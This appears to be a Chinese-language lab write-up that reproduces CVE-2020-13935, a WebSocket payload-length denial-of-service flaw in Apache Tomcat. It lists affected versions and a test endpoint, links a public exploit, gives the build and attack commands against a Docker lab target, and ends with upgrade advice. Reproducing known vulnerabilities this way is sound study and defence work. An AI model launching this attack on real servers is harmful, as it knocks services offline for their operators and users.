漏洞詳情:
Apache Tomcat是美國阿帕奇(Apache)軟件基金會的一款輕量級Web應(yīng)用服務(wù)器。該程序?qū)崿F(xiàn)了對Servlet和JavaServer Page(JSP)的支持。
Apache Tomcat中的WebSocket存在安全漏洞,該漏洞源于程序沒有正確驗證payload的長度。攻擊者可利用該漏洞造成拒絕服務(wù)(無限循環(huán))。
影響版本:
10.0.0-M1版本至10.0.0-M6版本
9.0.0.M1版本至9.0.36版本
8.5.0版本至8.5.56版本
7.0.27版本至7.0.104版本
漏洞判定:
一、是否是受影響版本。
二、echo.xhtml是否存在。
http://IP:端口/examples/websocket/echo.xhtml
漏洞驗證:
一、環(huán)境搭建
靶機參數(shù):Centos8.1
靶機配置:Docker
應(yīng)用容器:Tomcat-9.0.16
靶機Docker中部署Tomcat-9.0.16,并將Tomcat的8080端口綁定到本機的8001端口上:
docker run -it --name chendd-demo-tomcat -p 8001:8080 tomcat:9.0.16-jre8-alpine
運行結(jié)果 :
?結(jié)果驗證:
?
二、漏洞復(fù)現(xiàn)
攻擊機下載EXP:https://github.com/RedTeamPentesting/CVE-2020-13935
攻擊機編譯文件:go build(需要Go語言支持)
?
?查看受攻擊前靶機的CPU使用率:
開始攻擊:?
.\tcdos.exe ws://192.168.127.132:8001/examples/websocket/echoStreamAnnotation
攻擊結(jié)果:CPU已全部跑滿
漏洞修復(fù)及建議
一、修復(fù)方式:?升級補丁
二、修復(fù)建議:
升級到 Apache Tomcat 10.0.0-M7 或更高版本?
升級到 Apache Tomcat 9.0.37 或更高版本?文章來源:http://www.zghlxwxcb.cn/news/detail-507747.html
升級到 Apache Tomcat 8.5.57 或更高版本文章來源地址http://www.zghlxwxcb.cn/news/detail-507747.html
到了這里,關(guān)于Apache Tomcat 安全漏洞(CVE-2020-13935)復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!